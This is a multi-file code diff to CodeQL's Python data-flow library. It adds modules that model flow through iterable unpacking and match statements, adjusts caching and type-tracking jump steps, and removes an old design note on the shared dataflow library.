* An element, viewed as a node in a data flow graph. Either an SSA variable
* (`EssaNode`) or a control flow node (`CfgNode`).
*/
class Node extends TNode {
/** Gets a textual representation of this element. */
string toString() { result = "Data flow node" }
cached
string toString() {
Stages::DataFlow::ref() and
result = "Data flow node"
}
/** Gets the scope of this node. */
Scope getScope() { none() }
@@ -121,9 +140,11 @@ class Node extends TNode {
* For more information, see
* [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
*/
cached
predicate hasLocationInfo(
string filepath, int startline, int startcolumn, int endline, int endcolumn
) {
Stages::DataFlow::ref() and
this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn)
}
@@ -190,7 +211,7 @@ class CallCfgNode extends CfgNode, LocalSourceNode {
*/
Node getFunction() { result.asCfgNode() = node.getFunction() }
/** Gets the data-flow node corresponding to the i'th argument of the call corresponding to this data-flow node */
/** Gets the data-flow node corresponding to the i'th positional argument of the call corresponding to this data-flow node */
Node getArg(int i) { result.asCfgNode() = node.getArg(i) }
/** Gets the data-flow node corresponding to the named argument of the call corresponding to this data-flow node */
@@ -380,8 +401,15 @@ class ModuleVariableNode extends Node, TModuleVariableNode {
private predicate isAccessedThroughImportStar(Module m) { m = ImportStar::getStarImported(_) }
private ModuleVariableNode import_star_read(Node n) {
ImportStar::importStarResolvesTo(n.asCfgNode(), result.getModule()) and
n.asCfgNode().(NameNode).getId() = result.getVariable().getId()
resolved_import_star_module(result.getModule(), result.getVariable().getId(), n)
}
pragma[nomagic]
private predicate resolved_import_star_module(Module m, string name, Node n) {
exists(NameNode nn | nn = n.asCfgNode() |
ImportStar::importStarResolvesTo(pragma[only_bind_into](nn), m) and
nn.getId() = name
)
}
/**
@@ -622,3 +650,20 @@ class AttributeContent extends TAttributeContent, Content {
override string toString() { result = "Attribute " + attr }
}
/**
* An entity that represents a set of `Content`s.
*
* The set may be interpreted differently depending on whether it is
* stored into (`getAStoreContent`) or read from (`getAReadContent`).
*/
class ContentSet instanceof Content {
/** Gets a content that may be stored into when storing into this set. */
Content getAStoreContent() { result = this }
/** Gets a content that may be read from when reading from this set. */
Content getAReadContent() { result = this }
/** Gets a textual representation of this content set. */
string toString() { result = super.toString() }
}

View File

@@ -2,6 +2,7 @@
* Contains utility functions for writing data flow queries
*/
private import python
private import DataFlowPrivate
import DataFlowPublic

View File

@@ -0,0 +1,396 @@
/**
* The unpacking assignment takes the general form
* ```python
* sequence = iterable
* ```
* where `sequence` is either a tuple or a list and it can contain wildcards.
* The iterable can be any iterable, which means that (CodeQL modeling of) content
* will need to change type if it should be transferred from the LHS to the RHS.
*
* Note that (CodeQL modeling of) content does not have to change type on data-flow
* paths _inside_ the LHS, as the different allowed syntaxes here are merely a convenience.
* Consequently, we model all LHS sequences as tuples, which have the more precise content
* model, making flow to the elements more precise. If an element is a starred variable,
* we will have to mutate the content type to be list content.
*
* We may for instance have
* ```python
* (a, b) = ["a", SOURCE] # RHS has content `ListElementContent`
* ```
* Due to the abstraction for list content, we do not know whether `SOURCE`
* ends up in `a` or in `b`, so we want to overapproximate and see it in both.
*
* Using wildcards we may have
* ```python
* (a, *b) = ("a", "b", SOURCE) # RHS has content `TupleElementContent(2)`
* ```
* Since the starred variables are always assigned (Python-)type list, `*b` will be
* `["b", SOURCE]`, and we will again overapproximate and assign it
* content corresponding to anything found in the RHS.
*
* For a precise transfer
* ```python
* (a, b) = ("a", SOURCE) # RHS has content `TupleElementContent(1)`
* ```
* we wish to keep the precision, so only `b` receives the tuple content at index 1.
*
* Finally, `sequence` is actually a pattern and can have a more complicated structure,
* such as
* ```python
* (a, [b, *c]) = ("a", ["b", SOURCE]) # RHS has content `TupleElementContent(1); ListElementContent`
* ```
* where `a` should not receive content, but `b` and `c` should. `c` will be `[SOURCE]` so
* should have the content transferred, while `b` should read it.
*
* To transfer content from RHS to the elements of the LHS in the expression `sequence = iterable`,
* we use two synthetic nodes:
*
* - `TIterableSequence(sequence)` which captures the content-modeling the entire `sequence` will have
* (essentially just a copy of the content-modeling the RHS has)
*
* - `TIterableElement(sequence)` which captures the content-modeling that will be assigned to an element.
* Note that an empty access path means that the value we are tracking flows directly to the element.
*
*
* The `TIterableSequence(sequence)` is at this point superflous but becomes useful when handling recursive
* structures in the LHS, where `sequence` is some internal sequence node. We can have a uniform treatment
* by always having these two synthetic nodes. So we transfer to (or, in the recursive case, read into)
* `TIterableSequence(sequence)`, from which we take a read step to `TIterableElement(sequence)` and then a
* store step to `sequence`.
*
* This allows the unknown content from the RHS to be read into `TIterableElement(sequence)` and tuple content
* to then be stored into `sequence`. If the content is already tuple content, this inderection creates crosstalk
* between indices. Therefore, tuple content is never read into `TIterableElement(sequence)`; it is instead
* transferred directly from `TIterableSequence(sequence)` to `sequence` via a flow step. Such a flow step will
* also transfer other content, but only tuple content is further read from `sequence` into its elements.
*
* The strategy is then via several read-, store-, and flow steps:
* 1. a) [Flow] Content is transferred from `iterable` to `TIterableSequence(sequence)` via a
* flow step. From here, everything happens on the LHS.
*
* b) [Read] If the unpacking happens inside a for as in
* ```python
* for sequence in iterable
* ```
* then content is read from `iterable` to `TIterableSequence(sequence)`.
*
* 2. [Flow] Content is transferred from `TIterableSequence(sequence)` to `sequence` via a
* flow step. (Here only tuple content is relevant.)
*
* 3. [Read] Content is read from `TIterableSequence(sequence)` into `TIterableElement(sequence)`.
* As `sequence` is modeled as a tuple, we will not read tuple content as that would allow
* crosstalk.
*
* 4. [Store] Content is stored from `TIterableElement(sequence)` to `sequence`.
* Content type is `TupleElementContent` with indices taken from the syntax.
* For instance, if `sequence` is `(a, *b, c)`, content is written to index 0, 1, and 2.
* This is adequate as the route through `TIterableElement(sequence)` does not transfer precise content.
*
* 5. [Read] Content is read from `sequence` to its elements.
* a) If the element is a plain variable, the target is the corresponding essa node.
*
* b) If the element is itself a sequence, with control-flow node `seq`, the target is `TIterableSequence(seq)`.
*
* c) If the element is a starred variable, with control-flow node `v`, the target is `TIterableElement(v)`.
*
* 6. [Store] Content is stored from `TIterableElement(v)` to the essa variable for `v`, with
* content type `ListElementContent`.
*
* 7. [Flow, Read, Store] Steps 2 through 7 are repeated for all recursive elements which are sequences.
*
*
* We illustrate the above steps on the assignment
*
* ```python
* (a, b) = ["a", SOURCE]
* ```
*
* Looking at the content propagation to `a`:
* `["a", SOURCE]`: [ListElementContent]
*
* --Step 1a-->
*
* `TIterableSequence((a, b))`: [ListElementContent]
*
* --Step 3-->
*
* `TIterableElement((a, b))`: []
*
* --Step 4-->
*
* `(a, b)`: [TupleElementContent(0)]
*
* --Step 5a-->
*
* `a`: []
*
* Meaning there is data-flow from the RHS to `a` (an over approximation). The same logic would be applied to show there is data-flow to `b`. Note that _Step 3_ and _Step 4_ would not have been needed if the RHS had been a tuple (since that would have been able to use _Step 2_ instead).
*
* Another, more complicated example:
* ```python
* (a, [b, *c]) = ["a", [SOURCE]]
* ```
* where the path to `c` is
*
* `["a", [SOURCE]]`: [ListElementContent; ListElementContent]
*
* --Step 1a-->
*
* `TIterableSequence((a, [b, *c]))`: [ListElementContent; ListElementContent]
*
* --Step 3-->
*
* `TIterableElement((a, [b, *c]))`: [ListElementContent]
*
* --Step 4-->
*
* `(a, [b, *c])`: [TupleElementContent(1); ListElementContent]
*
* --Step 5b-->
*
* `TIterableSequence([b, *c])`: [ListElementContent]
*
* --Step 3-->
*
* `TIterableElement([b, *c])`: []
*
* --Step 4-->
*
* `[b, *c]`: [TupleElementContent(1)]
*
* --Step 5c-->
*
* `TIterableElement(c)`: []
*
* --Step 6-->
*
* `c`: [ListElementContent]
*/
private import python
private import DataFlowPublic
/**
* The target of a `for`, e.g. `x` in `for x in list` or in `[42 for x in list]`.
* This class also records the source, which in both above cases is `list`.
* This class abstracts away the differing representations of comprehensions and
* for statements.
*/
class ForTarget extends ControlFlowNode {
Expr source;
ForTarget() {
exists(For for |
source = for.getIter() and
this.getNode() = for.getTarget() and
not for = any(Comp comp).getNthInnerLoop(0)
)
or
exists(Comp comp |
source = comp.getIterable() and
this.getNode() = comp.getNthInnerLoop(0).getTarget()
)
}
Expr getSource() { result = source }
}
/** The LHS of an assignment, it also records the assigned value. */
class AssignmentTarget extends ControlFlowNode {
Expr value;
AssignmentTarget() {
exists(Assign assign | this.getNode() = assign.getATarget() | value = assign.getValue())
}
Expr getValue() { result = value }
}
/** A direct (or top-level) target of an unpacking assignment. */
class UnpackingAssignmentDirectTarget extends ControlFlowNode {
Expr value;
UnpackingAssignmentDirectTarget() {
this instanceof SequenceNode and
(
value = this.(AssignmentTarget).getValue()
or
value = this.(ForTarget).getSource()
)
}
Expr getValue() { result = value }
}
/** A (possibly recursive) target of an unpacking assignment. */
class UnpackingAssignmentTarget extends ControlFlowNode {
UnpackingAssignmentTarget() {
this instanceof UnpackingAssignmentDirectTarget
or
this = any(UnpackingAssignmentSequenceTarget parent).getAnElement()
}
}
/** A (possibly recursive) target of an unpacking assignment which is also a sequence. */
class UnpackingAssignmentSequenceTarget extends UnpackingAssignmentTarget instanceof SequenceNode {
ControlFlowNode getElement(int i) { result = super.getElement(i) }
ControlFlowNode getAnElement() { result = this.getElement(_) }
}
/**
* Step 1a
* Data flows from `iterable` to `TIterableSequence(sequence)`
*/
predicate iterableUnpackingAssignmentFlowStep(Node nodeFrom, Node nodeTo) {
exists(AssignmentTarget target |
nodeFrom.asExpr() = target.getValue() and
nodeTo = TIterableSequenceNode(target)
)
}
/**
* Step 1b
* Data is read from `iterable` to `TIterableSequence(sequence)`
*/
predicate iterableUnpackingForReadStep(CfgNode nodeFrom, Content c, Node nodeTo) {
exists(ForTarget target |
nodeFrom.asExpr() = target.getSource() and
target instanceof SequenceNode and
nodeTo = TIterableSequenceNode(target)
) and
(
c instanceof ListElementContent
or
c instanceof SetElementContent
)
}
/**
* Step 2
* Data flows from `TIterableSequence(sequence)` to `sequence`
*/
predicate iterableUnpackingTupleFlowStep(Node nodeFrom, Node nodeTo) {
exists(UnpackingAssignmentSequenceTarget target |
nodeFrom = TIterableSequenceNode(target) and
nodeTo.asCfgNode() = target
)
}
/**
* Step 3
* Data flows from `TIterableSequence(sequence)` into `TIterableElement(sequence)`.
* As `sequence` is modeled as a tuple, we will not read tuple content as that would allow
* crosstalk.
*/
predicate iterableUnpackingConvertingReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(UnpackingAssignmentSequenceTarget target |
nodeFrom = TIterableSequenceNode(target) and
nodeTo = TIterableElementNode(target) and
(
c instanceof ListElementContent
or
c instanceof SetElementContent
// TODO: dict content in iterable unpacking not handled
)
)
}
/**
* Step 4
* Data flows from `TIterableElement(sequence)` to `sequence`.
* Content type is `TupleElementContent` with indices taken from the syntax.
* For instance, if `sequence` is `(a, *b, c)`, content is written to index 0, 1, and 2.
*/
predicate iterableUnpackingConvertingStoreStep(Node nodeFrom, Content c, Node nodeTo) {
exists(UnpackingAssignmentSequenceTarget target |
nodeFrom = TIterableElementNode(target) and
nodeTo.asCfgNode() = target and
exists(int index | exists(target.getElement(index)) |
c.(TupleElementContent).getIndex() = index
)
)
}
/**
* Step 5
* For a sequence node inside an iterable unpacking, data flows from the sequence to its elements. There are
* three cases for what `toNode` should be:
* a) If the element is a plain variable, `toNode` is the corresponding essa node.
*
* b) If the element is itself a sequence, with control-flow node `seq`, `toNode` is `TIterableSequence(seq)`.
*
* c) If the element is a starred variable, with control-flow node `v`, `toNode` is `TIterableElement(v)`.
*/
predicate iterableUnpackingElementReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(
UnpackingAssignmentSequenceTarget target, int index, ControlFlowNode element, int starIndex
|
target.getElement(starIndex) instanceof StarredNode
or
not exists(target.getAnElement().(StarredNode)) and
starIndex = -1
|
nodeFrom.asCfgNode() = target and
element = target.getElement(index) and
(
if starIndex = -1 or index < starIndex
then c.(TupleElementContent).getIndex() = index
else
// This could get big if big tuples exist
if index = starIndex
then c.(TupleElementContent).getIndex() >= index
else c.(TupleElementContent).getIndex() >= index - 1
) and
(
if element instanceof SequenceNode
then
// Step 5b
nodeTo = TIterableSequenceNode(element)
else
if element instanceof StarredNode
then
// Step 5c
nodeTo = TIterableElementNode(element)
else
// Step 5a
nodeTo.asVar().getDefinition().(MultiAssignmentDefinition).getDefiningNode() = element
)
)
}
/**
* Step 6
* Data flows from `TIterableElement(v)` to the essa variable for `v`, with
* content type `ListElementContent`.
*/
predicate iterableUnpackingStarredElementStoreStep(Node nodeFrom, Content c, Node nodeTo) {
exists(ControlFlowNode starred | starred.getNode() instanceof Starred |
nodeFrom = TIterableElementNode(starred) and
nodeTo.asVar().getDefinition().(MultiAssignmentDefinition).getDefiningNode() = starred and
c instanceof ListElementContent
)
}
/** All read steps associated with unpacking assignment. */
predicate iterableUnpackingReadStep(Node nodeFrom, Content c, Node nodeTo) {
iterableUnpackingForReadStep(nodeFrom, c, nodeTo)
or
iterableUnpackingElementReadStep(nodeFrom, c, nodeTo)
or
iterableUnpackingConvertingReadStep(nodeFrom, c, nodeTo)
}
/** All store steps associated with unpacking assignment. */
predicate iterableUnpackingStoreStep(Node nodeFrom, Content c, Node nodeTo) {
iterableUnpackingStarredElementStoreStep(nodeFrom, c, nodeTo)
or
iterableUnpackingConvertingStoreStep(nodeFrom, c, nodeTo)
}
/** All flow steps associated with unpacking assignment. */
predicate iterableUnpackingFlowStep(Node nodeFrom, Node nodeTo) {
iterableUnpackingAssignmentFlowStep(nodeFrom, nodeTo)
or
iterableUnpackingTupleFlowStep(nodeFrom, nodeTo)
}

View File

@@ -6,9 +6,10 @@
* local tracking within a function.
*/
import python
private import python
import DataFlowPublic
private import DataFlowPrivate
private import semmle.python.internal.CachedStages
/**
* A data flow node that is a source of local flow. This includes things like
@@ -33,6 +34,7 @@ private import DataFlowPrivate
class LocalSourceNode extends Node {
cached
LocalSourceNode() {
Stages::DataFlow::ref() and
this instanceof ExprNode and
not simpleLocalFlowStep(_, this)
or
@@ -176,6 +178,7 @@ private module Cached {
*/
cached
predicate hasLocalSource(Node sink, LocalSourceNode source) {
Stages::DataFlow::ref() and
source = sink
or
exists(Node second |

View File

@@ -0,0 +1,311 @@
/**
* There are a number of patterns available for the match statement.
* Each one transfers data and content differently to its parts.
*
* Furthermore, given a successful match, we can infer some data about
* the subject. Consider the example:
* ```python
* match choice:
* case 'Y':
* ...body
* ```
* Inside `body`, we know that `choice` has the value `'Y'`.
*
* A similar thing happens with the "as pattern". Consider the example:
* ```python
* match choice:
* case ('y'|'Y') as c:
* ...body
* ```
* By the binding rules, there is data flow from `choice` to `c`. But we
* can infer the value of `c` to be either `'y'` or `'Y'` if the match succeeds.
*
* We will treat such inferences separately as guards. First we will model the data flow
* stemming from the bindings and the matching of shape. Below, 'subject' is not necessarily the
* top-level subject of the match, but rather the part recursively matched by the current pattern.
* For instance, in the example:
* ```python
* match command:
* case ('quit' as c) | ('go', ('up'|'down') as c):
* ...body
* ```
* `command` is the subject of first the as-pattern, while the second component of `command`
* is the subject of the second as-pattern. As such, 'subject' refers to the pattern under evaluation.
*
* - as pattern: subject flows to alias as well as to the interior pattern
* - or pattern: subject flows to each alternative
* - literal pattern: flow from the literal to the pattern, to add information
* - capture pattern: subject flows to the variable
* - wildcard pattern: no flow
* - value pattern: flow from the value to the pattern, to add information
* - sequence pattern: each element reads from subject at the associated index
* - star pattern: subject flows to the variable, possibly via a conversion
* - mapping pattern: each value reads from subject at the associated key
* - double star pattern: subject flows to the variable, possibly via a conversion
* - key-value pattern: the value reads from the subject at the key (see mapping pattern)
* - class pattern: all keywords read the appropriate attribute from the subject
* - keyword pattern: the appropriate attribute is read from the subject (see class pattern)
*
* Inside the class pattern, we also find positional arguments. They are converted to
* keyword arguments using the `__match_args__` attribute on the class. We do not
* currently model this.
*/
private import python
private import DataFlowPublic
/**
* Holds when there is flow from the subject `nodeFrom` to the (top-level) pattern `nodeTo` of a `match` statement.
*
* The subject of a match flows to each top-level pattern
* (a pattern directly under a `case` statement).
*
* We could consider a model closer to use-use-flow, where the subject
* only flows to the first top-level pattern and from there to the
* following ones.
*/
predicate matchSubjectFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchStmt match, Expr subject, Pattern target |
subject = match.getSubject() and
target = match.getCase(_).(Case).getPattern()
|
nodeFrom.asExpr() = subject and
nodeTo.asCfgNode().getNode() = target
)
}
/**
* as pattern: subject flows to alias as well as to the interior pattern
* syntax (toplevel): `case pattern as alias:`
*/
predicate matchAsFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchAsPattern subject, Name alias | alias = subject.getAlias() |
// We make the subject flow to the interior pattern via the alias.
// That way, information can propagate from the interior pattern to the alias.
//
// the subject flows to the interior pattern
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = subject.getPattern()
or
// the interior pattern flows to the alias
nodeFrom.asCfgNode().getNode() = subject.getPattern() and
nodeTo.asVar().getDefinition().(PatternAliasDefinition).getDefiningNode().getNode() = alias
)
}
/**
* or pattern: subject flows to each alternative
* syntax (toplevel): `case alt1 | alt2:`
*/
predicate matchOrFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchOrPattern subject, Pattern pattern | pattern = subject.getAPattern() |
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = pattern
)
}
/**
* literal pattern: flow from the literal to the pattern, to add information
* syntax (toplevel): `case literal:`
*/
predicate matchLiteralFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchLiteralPattern pattern, Expr literal | literal = pattern.getLiteral() |
nodeFrom.asExpr() = literal and
nodeTo.asCfgNode().getNode() = pattern
)
}
/**
* capture pattern: subject flows to the variable
* syntax (toplevel): `case var:`
*/
predicate matchCaptureFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchCapturePattern capture, Name var | capture.getVariable() = var |
nodeFrom.asCfgNode().getNode() = capture and
nodeTo.asVar().getDefinition().(PatternCaptureDefinition).getDefiningNode().getNode() = var
)
}
/**
* value pattern: flow from the value to the pattern, to add information
* syntax (toplevel): `case Dotted.value:`
*/
predicate matchValueFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchValuePattern pattern, Expr value | value = pattern.getValue() |
nodeFrom.asExpr() = value and
nodeTo.asCfgNode().getNode() = pattern
)
}
/**
* sequence pattern: each element reads from subject at the associated index
* syntax (toplevel): `case [a, b]:`
*/
predicate matchSequenceReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchSequencePattern subject, int index, Pattern element |
element = subject.getPattern(index)
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = element and
(
// tuple content
c.(TupleElementContent).getIndex() = index
or
// list content
c instanceof ListElementContent
// set content is excluded from sequence patterns,
// see https://www.python.org/dev/peps/pep-0635/#sequence-patterns
)
)
}
/**
* star pattern: subject flows to the variable, possibly via a conversion
* syntax (toplevel): `case *var:`
*
* We decompose this flow into a read step and a store step. The read step
* reads both tuple and list content, the store step only stores list content.
* This way, we convert all content to list content.
*
* This is the read step.
*/
predicate matchStarReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchSequencePattern subject, int index, MatchStarPattern star |
star = subject.getPattern(index)
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo = TStarPatternElementNode(star) and
(
// tuple content
c.(TupleElementContent).getIndex() >= index
or
// list content
c instanceof ListElementContent
// set content is excluded from sequence patterns,
// see https://www.python.org/dev/peps/pep-0635/#sequence-patterns
)
)
}
/**
* star pattern: subject flows to the variable, possibly via a conversion
* syntax (toplevel): `case *var:`
*
* We decompose this flow into a read step and a store step. The read step
* reads both tuple and list content, the store step only stores list content.
* This way, we convert all content to list content.
*
* This is the store step.
*/
predicate matchStarStoreStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchStarPattern star |
nodeFrom = TStarPatternElementNode(star) and
nodeTo.asCfgNode().getNode() = star.getTarget() and
c instanceof ListElementContent
)
}
/**
* mapping pattern: each value reads from subject at the associated key
* syntax (toplevel): `case {"color": c, "height": x}:`
*/
predicate matchMappingReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(
MatchMappingPattern subject, MatchKeyValuePattern keyValue, MatchLiteralPattern key,
Pattern value
|
keyValue = subject.getAMapping() and
key = keyValue.getKey() and
value = keyValue.getValue()
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = value and
c.(DictionaryElementContent).getKey() = key.getLiteral().(StrConst).getText()
)
}
/**
* double star pattern: subject flows to the variable, possibly via a conversion
* syntax (toplevel): `case {**var}:`
*
* Dictionary content flows to the double star, but all mentioned keys in the
* mapping pattern should be cleared.
*/
predicate matchMappingFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchMappingPattern subject, MatchDoubleStarPattern dstar | dstar = subject.getAMapping() |
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = dstar.getTarget()
)
}
/**
* Bindings that are mentioned in a mapping pattern will not be available
* to a double star pattern in the same mapping pattern.
*/
predicate matchMappingClearStep(Node n, Content c) {
exists(
MatchMappingPattern subject, MatchKeyValuePattern keyValue, MatchLiteralPattern key,
MatchDoubleStarPattern dstar
|
keyValue = subject.getAMapping() and
key = keyValue.getKey() and
dstar = subject.getAMapping()
|
n.asCfgNode().getNode() = dstar.getTarget() and
c.(DictionaryElementContent).getKey() = key.getLiteral().(StrConst).getText()
)
}
/**
* class pattern: all keywords read the appropriate attribute from the subject
* syntax (toplevel): `case ClassName(attr = val):`
*/
predicate matchClassReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchClassPattern subject, MatchKeywordPattern keyword, Name attr, Pattern value |
keyword = subject.getKeyword(_) and
attr = keyword.getAttribute() and
value = keyword.getValue()
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = value and
c.(AttributeContent).getAttribute() = attr.getId()
)
}
/** All flow steps associated with match. */
predicate matchFlowStep(Node nodeFrom, Node nodeTo) {
matchSubjectFlowStep(nodeFrom, nodeTo)
or
matchAsFlowStep(nodeFrom, nodeTo)
or
matchOrFlowStep(nodeFrom, nodeTo)
or
matchLiteralFlowStep(nodeFrom, nodeTo)
or
matchCaptureFlowStep(nodeFrom, nodeTo)
or
matchValueFlowStep(nodeFrom, nodeTo)
or
matchMappingFlowStep(nodeFrom, nodeTo)
}
/** All read steps associated with match. */
predicate matchReadStep(Node nodeFrom, Content c, Node nodeTo) {
matchClassReadStep(nodeFrom, c, nodeTo)
or
matchSequenceReadStep(nodeFrom, c, nodeTo)
or
matchMappingReadStep(nodeFrom, c, nodeTo)
or
matchStarReadStep(nodeFrom, c, nodeTo)
}
/** All store steps associated with match. */
predicate matchStoreStep(Node nodeFrom, Content c, Node nodeTo) {
matchStarStoreStep(nodeFrom, c, nodeTo)
}
/**
* All clear steps associated with match
*/
predicate matchClearStep(Node n, Content c) { matchMappingClearStep(n, c) }

View File

@@ -9,6 +9,7 @@
private import python
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.dataflow.new.internal.DataFlowPrivate as DataFlowPrivate
/**
* INTERNAL: Do not use.
@@ -66,7 +67,12 @@ string prettyNodeForInlineTest(DataFlow::Node node) {
result = "[post]" + prettyExpr(e)
)
or
exists(Expr e | e = node.(DataFlowPrivate::SyntheticPreUpdateNode).getPostUpdateNode().asExpr() |
result = "[pre]" + prettyExpr(e)
)
or
not exists(node.asExpr()) and
not exists(node.(DataFlow::PostUpdateNode).getPreUpdateNode().asExpr()) and
not exists(node.(DataFlowPrivate::SyntheticPreUpdateNode).getPostUpdateNode().asExpr()) and
result = node.toString()
}

View File

@@ -34,7 +34,8 @@ private module Cached {
CallStep() or
ReturnStep() or
StoreStep(ContentName content) or
LoadStep(ContentName content)
LoadStep(ContentName content) or
JumpStep()
/** Gets the summary resulting from appending `step` to type-tracking summary `tt`. */
cached
@@ -49,6 +50,9 @@ private module Cached {
step = LoadStep(content) and result = MkTypeTracker(hasCall, "")
or
exists(string p | step = StoreStep(p) and content = "" and result = MkTypeTracker(hasCall, p))
or
step = JumpStep() and
result = MkTypeTracker(false, content)
)
}
@@ -67,6 +71,9 @@ private module Cached {
)
or
step = StoreStep(content) and result = MkTypeBackTracker(hasReturn, "")
or
step = JumpStep() and
result = MkTypeBackTracker(false, content)
)
}
@@ -110,12 +117,17 @@ class StepSummary extends TStepSummary {
exists(string content | this = StoreStep(content) | result = "store " + content)
or
exists(string content | this = LoadStep(content) | result = "load " + content)
or
this instanceof JumpStep and result = "jump"
}
}
pragma[noinline]
private predicate smallstepNoCall(Node nodeFrom, TypeTrackingNode nodeTo, StepSummary summary) {
jumpStep(nodeFrom, nodeTo) and
summary = JumpStep()
or
levelStep(nodeFrom, nodeTo) and
summary = LevelStep()
or
exists(string content |

View File

@@ -5,6 +5,7 @@
private import python
private import semmle.python.dataflow.new.internal.DataFlowPublic as DataFlowPublic
private import semmle.python.dataflow.new.internal.DataFlowPrivate as DataFlowPrivate
import semmle.python.internal.CachedStages
class Node = DataFlowPublic::Node;
@@ -12,13 +13,19 @@ class TypeTrackingNode = DataFlowPublic::TypeTrackingNode;
predicate simpleLocalFlowStep = DataFlowPrivate::simpleLocalFlowStep/2;
predicate jumpStep = DataFlowPrivate::jumpStep/2;
predicate jumpStep = DataFlowPrivate::jumpStepSharedWithTypeTracker/2;
/** Holds if there is a level step from `pred` to `succ`. */
predicate levelStep(Node pred, Node succ) { none() }
/**
* Gets the name of a possible piece of content. For Python, this is currently only attribute names,
* using the name of the attribute for the corresponding content.
*/
string getPossibleContentName() { result = any(DataFlowPublic::AttrRef a).getAttributeName() }
string getPossibleContentName() {
Stages::TypeTracking::ref() and // the TypeTracking::append() etc. predicates that we want to cache depend on this predicate, so we can place the `ref()` call here to get around identical files.
result = any(DataFlowPublic::AttrRef a).getAttributeName()
}
/**
* Gets a callable for the call where `nodeFrom` is used as the `i`'th argument.

View File

@@ -1,138 +0,0 @@
# Using the shared dataflow library
## File organisation
The files currently live in `experimental` (whereas the existing implementation lives in `semmle\python\dataflow`).
In there is found `DataFlow.qll`, `DataFlow2.qll` etc. which refer to `internal\DataFlowImpl`, `internal\DataFlowImpl2` etc. respectively. The `DataFlowImplN`-files are all identical copies to avoid mutual recursion. They start off by including two files `internal\DataFlowImplCommon` and `internal\DataFlowImplSpecific`. The former contains all the language-agnostic definitions, while the latter is where we describe our favorite language. `Sepcific` simply forwards to two other files `internal\DataFlowPrivate.qll` and `internal\DataFlowPublic.qll`. Definitions in the former will be hidden behind a `private` modifier, while those in the latter can be referred to in data flow queries. For instance, the definition of `DataFlow::Node` should likely be in `DataFlowPublic.qll`.
## Define the dataflow graph
In order to use the dataflow library, we need to define the dataflow graph,
that is define the nodes and the edges.
### Define the nodes
The nodes are defined in the type `DataFlow::Node` (found in `DataFlowPublic.qll`).
This should likely be an IPA type, so we can extend it as needed.
Typical cases needed to construct the call graph include
- argument node
- parameter node
- return node
Typical extensions include
- postupdate nodes
- implicit `this`-nodes
### Define the edges
The edges split into local flow (within a function) and global flow (the call graph, between functions/procedures).
Extra flow, such as reading from and writing to global variables, can be captured in `jumpStep`.
The local flow should be obtainalble from an SSA computation.
Local flow nodes are generally either control flow nodes or SSA variables.
Flow from control flow nodes to SSA variables comes from SSA variable definitions, while flow from SSA variables to control flow nodes comes from def-use pairs.
The global flow should be obtainable from a `PointsTo` analysis. It is specified via `viableCallable` and
`getAnOutNode`. Consider making `ReturnKind` a singleton IPA type as in java.
Global flow includes local flow within a consistent call context. Thus, for local flow to count as global flow, all relevant nodes should implement `getEnclosingCallable`.
If complicated dispatch needs to be modelled, try using the `[reduced|pruned]viable*` predicates.
## Field flow
To track flow through fields we need to provide a model of fields, that is the `Content` class.
Field access is specified via `read_step` and `store_step`.
Work is being done to make field flow handle lists and dictionaries and the like.
`PostUpdateNode`s become important when field flow is used, as they track modifications to fields resulting from function calls.
## Type pruning
If type information is available, flows can be discarded on the grounds of type mismatch.
Tracked types are given by the class `DataFlowType` and the predicate `getTypeBound`, and compatibility is recorded in the predicate `compatibleTypes`.
If type pruning is not used, `compatibleTypes` should be implemented as `any`; if it is implemented, say, as `none`, all flows will be pruned.
Further, possible casts are given by the class `CastNode`.
---
# Plan
## Stage I, data flow
### Phase 0, setup
Define minimal IPA type for `DataFlow::Node`
Define all required predicates empty (via `none()`),
except `compatibleTypes` which should be `any()`.
Define `ReturnKind`, `DataFlowType`, and `Content` as singleton IPA types.
### Phase 1, local flow
Implement `simpleLocalFlowStep` based on the existing SSA computation
### Phase 2, local flow
Implement `viableCallable` and `getAnOutNode` based on the existing predicate `PointsTo`.
### Phase 3, field flow
Redefine `Content` and implement `read_step` and `store_step`.
Review use of post-update nodes.
### Phase 4, type pruning
Use type trackers to obtain relevant type information and redefine `DataFlowType` to contain appropriate cases. Record the type information in `getTypeBound`.
Implement `compatibleTypes` (perhaps simply as the identity).
If necessary, re-implement `getErasedRepr` and `ppReprType`.
If necessary, redefine `CastNode`.
### Phase 5, bonus
Review possible use of `[reduced|pruned]viable*` predicates.
Review need for more elaborate `ReturnKind`.
Review need for non-empty `jumpStep`.
Review need for non-empty `isUnreachableInCall`.
## Stage II, taint tracking
# Phase 0, setup
Implement all predicates empty.
# Phase 1, experiments
Try recovering an existing taint tracking query by implementing sources, sinks, sanitizers, and barriers.
---
# Status
## Achieved
- Copy of shared library; implemented enough predicates to make it compile.
- Simple flow into, out of, and through functions.
- Some tests, in particular a sceleton for something comprehensive.
## TODO
- Implementation has largely been done by finding a plausibly-sounding predicate in the python library to refer to. We should review that we actually have the intended semantics in all places.
- Comprehensive testing.
